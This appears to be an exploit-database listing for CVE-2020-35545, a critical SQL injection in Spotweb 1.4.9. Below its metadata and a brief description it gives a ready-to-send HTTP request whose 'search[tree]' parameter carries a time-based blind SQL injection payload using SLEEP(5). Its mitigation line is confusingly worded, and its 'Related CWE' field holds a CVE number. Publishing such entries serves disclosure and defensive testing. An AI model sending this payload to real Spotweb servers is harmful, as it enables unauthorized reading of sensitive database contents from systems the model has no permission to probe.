header-logo
Suggest Exploit
vendor:
Spotweb
by:
BouSalman
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Spotweb
Affected Version From: 1.4.9
Affected Version To: 1.4.9
Patch Exists: YES
Related CWE: CVE-2020-35545
CPE: a:spotweb:spotweb:1.4.9
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu 18.04
2020

Spotweb 1.4.9 – ‘search’ SQL Injection

An SQL injection vulnerability exists in Spotweb 1.4.9. A remote attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. Successful exploitation of this vulnerability could allow an attacker to gain access to sensitive information from the database.

Mitigation:

Upgrade to the latest version of Spotweb 1.4.9 or later.
Source

Exploit-DB raw data:

# Exploit Title: Spotweb 1.4.9 - 'search' SQL Injection
# Google Dork: N/A
# Date: 20 December 2020
# Exploit Author: BouSalman
# Vendor Homepage: https://github.com/spotweb/spotweb
# Software Link: N/A
# Version: 1.4.9
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35545


GET /?page=index&search[tree]=cat0_z0_c')+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))c)+AND+(' HTTP/1.1
Host: 192.168.99.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Navigation

Suggest Exploit

Services By CQR